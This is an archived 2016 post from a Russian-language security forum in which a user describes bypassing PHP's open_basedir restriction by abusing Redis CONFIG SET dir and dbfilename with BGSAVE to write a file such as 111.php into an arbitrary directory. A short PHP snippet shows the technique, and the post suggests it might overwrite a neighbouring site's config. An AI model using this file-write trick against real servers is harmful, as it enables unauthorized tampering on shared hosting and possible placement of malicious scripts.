open_basedir — ANTICHAT Forum

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.

Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.

⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

14.04.2016, 21:23

t0ma5

Guest

Сообщений: n/a

Провел на форуме:
300820

Репутация: 90

просто размышления

вспомнилась относительно свежая новость

http://antirez.com/news/96

про запись файлов через redis

попробовал применить для обхода open_basedir, хм получилось, правда файл создался из под юзера redis + права по дефолту навесились 600, апач к нему не достучится, да и профит пока хз какой, хотя может быть в каких то случаях можно переписать конфиг соседнего сайта например(redis похоже пофиг что перезаписывать, лишь бы прав хватало на запись)

redis скомпилен модулем к апачу(Redis Version 2.2.4)

пример кода

.SpoilerTarget" type="button">Spoiler

Код:

Code:
$redis = new Redis();

$redis->connect('127.0.0.1', 6379);
$redis->set('key', 'value');

$redis->config("SET", "dir", "[путь_до_диры]");  /// должны быть как миниму права на запись на уровне файловой системы с учетом юзера из под которого крутится редис
$redis->config("SET", "dbfilename", "111.php");
$redis->bgSave();
$redis->save();

----------------

точнее не как модуль, а апач скомпилен с флагом --enable-redis ну и pecl там для редиса лежит